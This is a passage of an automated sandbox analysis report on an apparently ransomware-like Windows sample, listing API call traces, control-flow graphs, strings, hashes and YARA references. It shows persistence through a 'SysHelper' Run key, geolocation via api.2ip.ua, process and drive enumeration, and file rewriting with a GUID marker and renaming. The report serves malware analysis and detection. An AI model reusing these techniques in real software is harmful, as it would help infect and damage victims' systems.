                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 002F1471
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 002F1491
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 002F14CF
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 002F159D
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 002F15D0
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 002F15F8
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 002F1649
                                                                                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F166B
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F1678
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 002F168D
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 002F16D6
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002F16EB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                        • API String ID: 254274740-1186676987
                                                                                                                                                                        • Opcode ID: 6b29acaadd7d1291aaec1c0b15f41328f75d0d212c806961137b9c1b1e469569
                                                                                                                                                                        • Instruction ID: ad05ce9d11c172058b850767eecb36d6137424164090075370908d6472a08363
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b29acaadd7d1291aaec1c0b15f41328f75d0d212c806961137b9c1b1e469569
                                                                                                                                                                        • Instruction Fuzzy Hash: E722BB70E1020DEBEB15EFA4DC86BEEB7B8EF06304F504169E615A7291DB705A18CF61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F2220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1213 2f2220-2f228a call 30f7c0 GetCommandLineW CommandLineToArgvW PathFindFileNameW LoadLibraryW GetProcAddress * 3 1216 2f22bd-2f22d1 K32EnumProcesses 1213->1216 1217 2f228c-2f22ba LoadLibraryW GetProcAddress * 3 1213->1217 1218 2f22df-2f22ec 1216->1218 1219 2f22d3-2f22de 1216->1219 1217->1216 1220 2f22ee 1218->1220 1221 2f2353-2f235b 1218->1221 1222 2f22f0-2f2308 OpenProcess 1220->1222 1223 2f230a-2f231a K32EnumProcessModules 1222->1223 1224 2f2346-2f2351 CloseHandle 1222->1224 1223->1224 1225 2f231c-2f2339 K32GetModuleBaseNameW call 300235 1223->1225 1224->1221 1224->1222 1227 2f233e-2f2343 1225->1227 1227->1224 1228 2f2345 1227->1228 1228->1224
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 002F2235
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 002F2240
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 002F2248
                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 002F2256
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 002F226A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 002F2275
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 002F2280
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 002F2291
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 002F229F
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 002F22AA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 002F22B5
                                                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 002F22CD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 002F22FE
                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 002F2315
                                                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 002F232C
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002F2347
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                                                        • Opcode ID: 2fdc69bf75e198649c60b3c6644560a54e98dfbb799578be81de210839855eb5
                                                                                                                                                                        • Instruction ID: a45ce97b36859e6e0a3a14dda5fefaf7799ef00d4cc4c0ea5a5d019e723606df
                                                                                                                                                                        • Opcode Fuzzy Hash: 2fdc69bf75e198649c60b3c6644560a54e98dfbb799578be81de210839855eb5
                                                                                                                                                                        • Instruction Fuzzy Hash: A1318F71E1021DABDB11EFA58C45EEEB7BCEF46344F0101AAE904E2180DAB49A418FA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FF130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 002FF15E
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 002FF185
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 002FF19D
                                                                                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 002FF9D0
                                                                                                                                                                          • Part of subcall function 002F0A50: GetLogicalDrives.KERNEL32 ref: 002F0A75
                                                                                                                                                                          • Part of subcall function 002F0A50: SetErrorMode.KERNEL32(00000001,003E0234,00000002), ref: 002F0AE2
                                                                                                                                                                          • Part of subcall function 002F0A50: PathFileExistsA.SHLWAPI(?), ref: 002F0AF9
                                                                                                                                                                          • Part of subcall function 002F0A50: SetErrorMode.KERNEL32(00000000), ref: 002F0B02
                                                                                                                                                                          • Part of subcall function 002F0A50: GetDriveTypeA.KERNEL32(?), ref: 002F0B1B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                                                                        • String ID: C:\
                                                                                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                                                                                        • Opcode ID: 3afd4d524cefa8d05cf3f558af81a33399f772a2b424c20fcea25ca097751da5
                                                                                                                                                                        • Instruction ID: ff137bf0cdbb4f3d2ac219ac4b3963648d24315e8c81f2fe69a8790e934b13a7
                                                                                                                                                                        • Opcode Fuzzy Hash: 3afd4d524cefa8d05cf3f558af81a33399f772a2b424c20fcea25ca097751da5
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A42DF71D203099BDF24DFA8C984BAEF7B5BF04348F244139EA05AB381D7B5A915CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002ECF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1829 2ecf10-2ecfb0 call 30f7c0 call 30b420 InternetOpenW call 2f5c10 InternetOpenUrlW 1836 2ecfb9-2ecffb InternetReadFile InternetCloseHandle * 2 call 2f56d0 1829->1836 1837 2ecfb2-2ecfb4 1829->1837 1842 2ed000-2ed01d 1836->1842 1838 2ed213-2ed217 1837->1838 1840 2ed219-2ed221 call 302587 1838->1840 1841 2ed224-2ed236 1838->1841 1840->1841 1844 2ed01f-2ed021 1842->1844 1845 2ed023-2ed02c 1842->1845 1847 2ed039-2ed069 call 2f56d0 call 2f4300 1844->1847 1848 2ed030-2ed035 1845->1848 1854 2ed06f-2ed08b call 2f3010 1847->1854 1855 2ed1cb 1847->1855 1848->1848 1849 2ed037 1848->1849 1849->1847 1861 2ed08d-2ed091 1854->1861 1862 2ed0b9-2ed0bd 1854->1862 1857 2ed1cd-2ed1d1 1855->1857 1859 2ed1de-2ed1f4 1857->1859 1860 2ed1d3-2ed1db call 302587 1857->1860 1864 2ed1f6-2ed1fe call 302587 1859->1864 1865 2ed201-2ed20f 1859->1865 1860->1859 1866 2ed09e-2ed0b4 call 2f3d40 1861->1866 1867 2ed093-2ed09b call 302587 1861->1867 1869 2ed0bf-2ed0ca call 302587 1862->1869 1870 2ed0cd-2ed0e1 call 2f4300 1862->1870 1864->1865 1865->1838 1866->1862 1867->1866 1869->1870 1870->1855 1880 2ed0e7-2ed149 call 2f3010 1870->1880 1883 2ed150-2ed15a 1880->1883 1884 2ed15c-2ed15e 1883->1884 1885 2ed160-2ed162 1883->1885 1886 2ed16e-2ed18b call 2eb650 1884->1886 1887 2ed165-2ed16a 1885->1887 1891 2ed18d-2ed18f 1886->1891 1892 2ed19a-2ed19e 1886->1892 1887->1887 1888 2ed16c 1887->1888 1888->1886 1891->1892 1894 2ed191-2ed198 1891->1894 1892->1883 1893 2ed1a0 1892->1893 1895 2ed1a2-2ed1a6 1893->1895 1894->1892 1896 2ed1c7-2ed1c9 1894->1896 1897 2ed1a8-2ed1b0 call 302587 1895->1897 1898 2ed1b3-2ed1c5 1895->1898 1896->1895 1897->1898 1898->1857
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 002ECF4A
                                                                                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 002ECF5F
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002ECFA6
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 002ECFCD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002ECFDA
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002ECFDD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                                                                        • API String ID: 1485416377-933853286
                                                                                                                                                                        • Opcode ID: 26ee304c64c475d326b71aa3371a4fcd77ee24a3fa4f5a4fc9e844275d735708
                                                                                                                                                                        • Instruction ID: caba66b44eb90439a72649646cdab5782e9f66e3aec398a23133c87a1203b006
                                                                                                                                                                        • Opcode Fuzzy Hash: 26ee304c64c475d326b71aa3371a4fcd77ee24a3fa4f5a4fc9e844275d735708
                                                                                                                                                                        • Instruction Fuzzy Hash: 5891D070C50299DBEF25CFA1CC45BEEBBB8AF05304F604168E4097B281D7B25A98CF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FBAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1901 2fbae0-2fbb0d 1902 2fbb13 1901->1902 1903 2fbba0-2fbba7 1901->1903 1906 2fbb15-2fbb1a 1902->1906 1907 2fbb54-2fbb5e 1902->1907 1904 2fbf3d-2fbf47 1903->1904 1905 2fbbad-2fbbae 1903->1905 1912 2fbf5c-2fbf63 1904->1912 1913 2fbf49 1904->1913 1908 2fbbd7-2fbc45 call 300c62 GetComputerNameW call 2f3100 call 2fce80 1905->1908 1909 2fbbb0-2fbbd4 DefWindowProcW 1905->1909 1910 2fbb1c-2fbb1f 1906->1910 1911 2fbb47-2fbb4f PostQuitMessage 1906->1911 1914 2fbb64-2fbb68 1907->1914 1915 2fbf81-2fbf97 1907->1915 1935 2fbc7b-2fbc80 1908->1935 1936 2fbc47-2fbc4c 1908->1936 1910->1915 1921 2fbb25-2fbb28 1910->1921 1911->1915 1916 2fbf9a-2fbfc2 DefWindowProcW 1912->1916 1917 2fbf65-2fbf71 IsWindow 1912->1917 1922 2fbf50-2fbf54 1913->1922 1918 2fbb6a-2fbb6e 1914->1918 1919 2fbb75-2fbb9d DefWindowProcW 1914->1919 1917->1915 1923 2fbf73-2fbf7b DestroyWindow 1917->1923 1918->1914 1924 2fbb70 1918->1924 1921->1909 1926 2fbb2e-2fbb31 1921->1926 1922->1916 1927 2fbf56-2fbf5a 1922->1927 1923->1915 1924->1915 1926->1915 1929 2fbb37-2fbb42 call 2f1cd0 1926->1929 1927->1912 1927->1922 1929->1917 1937 2fbc8e-2fbcb1 1935->1937 1938 2fbc82-2fbc8b call 302587 1935->1938 1939 2fbc4e-2fbc57 call 302587 1936->1939 1940 2fbc5a-2fbc76 call 2f45a0 1936->1940 1943 2fbcbf-2fbcf1 call 300bed 1937->1943 1944 2fbcb3-2fbcbc call 302587 1937->1944 1938->1937 1939->1940 1940->1935 1952 2fbefb-2fbf0f IsWindow 1943->1952 1953 2fbcf7-2fbcfa 1943->1953 1944->1943 1954 2fbf28-2fbf2d 1952->1954 1955 2fbf11-2fbf18 1952->1955 1956 2fbd00-2fbd04 1953->1956 1954->1915 1960 2fbf2f-2fbf3b call 302587 1954->1960 1955->1954 1959 2fbf1a-2fbf22 DestroyWindow 1955->1959 1957 2fbd0a-2fbd0e 1956->1957 1958 2fbee5-2fbef1 1956->1958 1957->1958 1961 2fbd14-2fbd7b call 2f4690 * 2 call 2eeff0 1957->1961 1958->1956 1962 2fbef7-2fbef9 1958->1962 1959->1954 1960->1915 1971 2fbee1 1961->1971 1972 2fbd81-2fbe44 call 2fc330 call 2f9d10 call 2fc240 call 2fb680 call 2fb8b0 call 2f4690 call 2fce80 call 2f31d0 1961->1972 1962->1952 1962->1954 1971->1958 1989 2fbe46-2fbe52 call 302587 1972->1989 1990 2fbe55-2fbe81 1972->1990 1989->1990 1992 2fbe8f-2fbedf CreateThread 1990->1992 1993 2fbe83-2fbe8c call 302587 1990->1993 1992->1958 1993->1992
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 002FBB49
                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 002FBBBA
                                                                                                                                                                        • _malloc.LIBCMT ref: 002FBBE4
                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 002FBBF4
                                                                                                                                                                        • _free.LIBCMT ref: 002FBCD7
                                                                                                                                                                          • Part of subcall function 002F1CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D12
                                                                                                                                                                          • Part of subcall function 002F1CD0: _memset.LIBCMT ref: 002F1D3B
                                                                                                                                                                          • Part of subcall function 002F1CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 002F1D63
                                                                                                                                                                          • Part of subcall function 002F1CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,003AAC68,000000FF), ref: 002F1D6C
                                                                                                                                                                          • Part of subcall function 002F1CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 002F1DD6
                                                                                                                                                                          • Part of subcall function 002F1CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 002F1E48
                                                                                                                                                                        • IsWindow.USER32(?), ref: 002FBF69
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 002FBF7B
                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 002FBFA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3873257347-0
                                                                                                                                                                        • Opcode ID: 6f26a9af64924aca7e6f364f6b1c1911853d7b8f5522461d3fe6e1abdffd5df5
                                                                                                                                                                        • Instruction ID: fed0b7d7d432bbb25bb02eb9b0046608666b1b288c0e6d22b171a327c335a199
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f26a9af64924aca7e6f364f6b1c1911853d7b8f5522461d3fe6e1abdffd5df5
                                                                                                                                                                        • Instruction Fuzzy Hash: A3C1EE715283489FDB22DF24DC05B6AFBE4BF85354F104A2CF988972A1D7759824CF52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2147 2ec740-2ec792 call 300fdd 2150 2ec798-2ec7a3 call 300546 2147->2150 2151 2ec911-2ec915 2147->2151 2159 2ec7a9 2150->2159 2160 2ec906-2ec90e call 303a38 2150->2160 2152 2ec917 2151->2152 2153 2ec944-2ec968 CreateDirectoryW call 300fdd 2151->2153 2155 2ec920-2ec93b call 2f4c60 2152->2155 2164 2ec9af-2ec9b3 2153->2164 2165 2ec96a-2ec96c 2153->2165 2155->2165 2169 2ec93d-2ec942 2155->2169 2163 2ec7b0-2ec7bc call 301101 2159->2163 2160->2151 2175 2ec7c1-2ec7c6 2163->2175 2167 2ec9d8-2eca03 call 3028fd * 2 call 303a38 2164->2167 2168 2ec9b5 2164->2168 2171 2ec972-2ec976 2165->2171 2172 2eca43-2eca47 2165->2172 2167->2172 2215 2eca05-2eca09 2167->2215 2174 2ec9b8-2ec9bc 2168->2174 2169->2153 2169->2155 2176 2ec97c 2171->2176 2177 2eca3a-2eca40 call 302587 2171->2177 2179 2eca49-2eca51 call 302587 2172->2179 2180 2eca54-2eca64 2172->2180 2181 2ec9be-2ec9c0 2174->2181 2182 2ec9c2 2174->2182 2183 2ec7cc-2ec7e7 2175->2183 2184 2ec8f3-2ec900 call 300546 2175->2184 2186 2ec980-2ec984 2176->2186 2177->2172 2179->2180 2189 2ec9c4-2ec9d3 call 3028fd 2181->2189 2182->2189 2190 2ec7ed-2ec7f3 2183->2190 2191 2ec7e9-2ec7eb 2183->2191 2184->2160 2184->2163 2194 2ec986-2ec98d call 302587 2186->2194 2195 2ec990-2ec9a8 2186->2195 2189->2174 2211 2ec9d5 2189->2211 2201 2ec7f6-2ec7ff 2190->2201 2200 2ec805-2ec81e call 2f5c10 2191->2200 2194->2195 2195->2186 2198 2ec9aa 2195->2198 2198->2177 2213 2ec820-2ec822 2200->2213 2214 2ec861-2ec863 2200->2214 2201->2201 2207 2ec801-2ec803 2201->2207 2207->2200 2211->2167 2213->2214 2216 2ec824-2ec83c 2213->2216 2218 2ec874-2ec876 2214->2218 2219 2ec865-2ec871 call 2f4f70 2214->2219 2215->2177 2217 2eca0b 2215->2217 2220 2ec83e-2ec84a call 2f4f70 2216->2220 2221 2ec84d-2ec855 2216->2221 2222 2eca10-2eca14 2217->2222 2224 2ec878-2ec88f 2218->2224 2225 2ec8d5-2ec8e3 2218->2225 2219->2218 2220->2221 2221->2225 2229 2ec857-2ec85f call 2f3160 2221->2229 2227 2eca16-2eca1d call 302587 2222->2227 2228 2eca20-2eca38 2222->2228 2233 2ec8a9-2ec8ae 2224->2233 2234 2ec891-2ec895 2224->2234 2230 2ec8e5-2ec8ed call 302587 2225->2230 2231 2ec8f0 2225->2231 2227->2228 2228->2177 2228->2222 2229->2225 2230->2231 2231->2184 2236 2ec8b5-2ec8d1 2233->2236 2235 2ec897-2ec8a7 call 3005a0 2234->2235 2234->2236 2235->2236 2236->2225
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00300FDD: __wfsopen.LIBCMT ref: 00300FE8
                                                                                                                                                                        • _fgetws.LIBCMT ref: 002EC7BC
                                                                                                                                                                        • _memmove.LIBCMT ref: 002EC89F
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 002EC94B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
